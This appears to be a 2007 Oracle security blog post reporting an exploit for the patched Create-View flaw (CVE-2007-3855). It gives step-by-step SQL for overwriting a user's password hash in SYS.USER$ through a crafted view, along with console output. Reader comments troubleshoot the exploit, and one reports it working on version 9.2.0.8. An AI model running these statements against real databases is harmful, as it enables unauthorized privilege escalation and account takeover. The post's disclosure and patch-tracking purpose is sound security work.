- 11g (5)
- Allgemein (15)
- checkpwd (4)
- CPUApril2009 (2)
- CPUJan2009 (3)
- David Litchfield (5)
- Exploit (12)
- Forensics (4)
- Oracle Security (65)
- passwords (5)
- Security (12)
- Sentrigo (5)
- software (6)
- source code audit (3)
- SQL Injection (15)
- Tools (10)
- Trainings (1)
- Tutorial (2)
- 16 Mai 2009: Presentation from Confidence 2009 available
- 1 Mai 2009: Perl - Script to run OS commands via Oracle based Web Apps released
- 23 Apr 2009: SQLMap 0.7 rc is out
- 21 Apr 2009: Listener Exploit (April 2009) from Dennis Yurichev published
- 20 Apr 2009: Whitepaper: Penetration from Application down to OS
- 20 Apr 2009: Pangolin 2.0.2.820 with enhanced Oracle support
- 16 Apr 2009: 3 new Oracle Security Videos
- 16 Apr 2009: SQL Injection Tool Pangolin 2.0 published
- 15 Apr 2009: Oracle Database Scanner Repscan 2.5 trial available
- 14 Apr 2009: Oracle Critical Patch Update April 2009 (CPUApr2009) is out
Oracle Security
Other Blogs
SQL Injection
Trainings
Exploit for Create View Problem published
Andrea Purificato has published an exploit for the Create-View-Problem (DB17 aka CVE-2007-3855, bug found by Red-Database-Security). This issue was fixed with the July 2007 CPU.
The exploit updates the password hash in SYS.USER$ via a specially crafted view. But the exploit from Andrea does not work without additional steps because it is not supported to modify password hashes via an update command.
Example:
– We calculate the password hashes for the user RDS and the passwords RDS and HACKED with the makepwd command.
c:\tools>makepwd.exe RDS RDS
B2ABF50FCECAE7CB
c:\tools>makepwd.exe RDS HACKED
7B843A192FF96BE9
– Now we connect to the database and update the password hash via a specially crafted view.
SQL> connect cpu/cpu
Connected.
SQL> create or replace view bunkerview as
2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on
x.name=y.name;
View created.
SQL> update cpu.bunkerview set password=’7B843A192FF96BE9′ where name =’RDS’;
1 row updated.
SQL> commit;
Commit complete.
– The password is now changed to HACKED.
SQL> select password from sys.user$ where name=’RDS’;
PASSWORD
——————————
7B843A192FF96BE9
– But the connect attempt throws an error message…
SQL> connect rds/hacked
ERROR:
ORA-01017: invalid username/password; logon denied
Warning: You are no longer connected to ORACLE.
– To activate the password change it is necessary to restart the database.
C:\>sqlplus rds/hacked
SQL*Plus: Release 10.2.0.3.0 - Production on Sun Jul 22 18:24:41 2007
Copyright (c) 1982, 2006, Oracle. All Rights Reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 - Production
With the Partitioning, OLAP and Data Mining Scoring Engine options
SQL>
5 Antworten auf “Exploit for Create View Problem published”
Antwort schreiben
Sie müssen als angemeldet sein, um einen Kommentar schreiben zu können.
25 Jul 2007 bei 11:32
Alex,
I tried the bunkerview on a 10203 database which had patch 7 (6038241) applied which is also labeled as cpu APRIL 2007 and it failed. So looks like it was already fixed before Cpu July 2007 came out. I have the feeling that Oracle releases security fixes in between cpu’s as well.
Below’s the patch history on windows 32 it platform for 10.2.0.3 since cpu april 2007:
6116131 PATCH 8 WINDOWS 32 BIT 10.2.0.3 17-JUL-2007 (First Cpu July 2007)
6038241 PATCH 7 WINDOWS 32 BIT 10.2.0.3 05-JUL-2007
6012742 PATCH 6 WINDOWS 32 BIT 10.2.0.3 07-JUN-2007
5946186 PATCH 5 WINDOWS 32 BIT 10.2.0.3 19-MAY-2007
5948242 PATCH 4 WINDOWS 32 BIT 10.2.0.3 17-APR-2007 (First Cpu April 2007)
SQL> show user
USER is “HEK”
SQL> select * from user_sys_privs;
USERNAME PRIVILEGE ADM
—————————— —————————————- —
HEK CREATE SESSION NO
HEK CREATE VIEW NO
SQL> get bunkerview2
1 create or replace view bunkerview as
2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on
3* x.name=y.name
SQL> /
select x.name,x.password from sys.user$ x left outer join sys.user$ y on
*
ERROR at line 2:
ORA-00942: table or view does not exist
25 Jul 2007 bei 16:30
You need the “select” privilege on sys.user$.
Otherwise you can try to create a similar view on another table, where you can do select, and make update, insert or delete on it!
Bye,
bunker
27 Jul 2007 bei 08:09
Hi.
Tried this.
dont work.
USERS PRIVILEGE:
CREATE SESSION
CREATE VIEW.
Have right for select on table Contragent.
Write script:
create or replace view test_hack_view as select x.id, x.insiderid from cret.contragent x left outer join cret.contragent y on x.id=y.id;
update test_hack_view set insiderid=’1′ where id=’12345′;
GO/
and receive error:
ORA-01031: insufficient privileges.
Whats right I must have for this exploit?
27 Jul 2007 bei 16:37
Seydon,
I don’t see the problem. You need only SELECT and CREATE VIEW privileges.
What database version do you have? You could try the following view instead:
create or replace hackcontra as
This was one of our testcases:
—————————
create view hackdual as
select * from dual
delete from hackdual;
rollback;
30 Jul 2007 bei 11:44
Thanks.
It’s work!!!
With “left join” - dont’t work.
With “…WHERE ID IN…” work perfect.
Version - 9.2.0.8.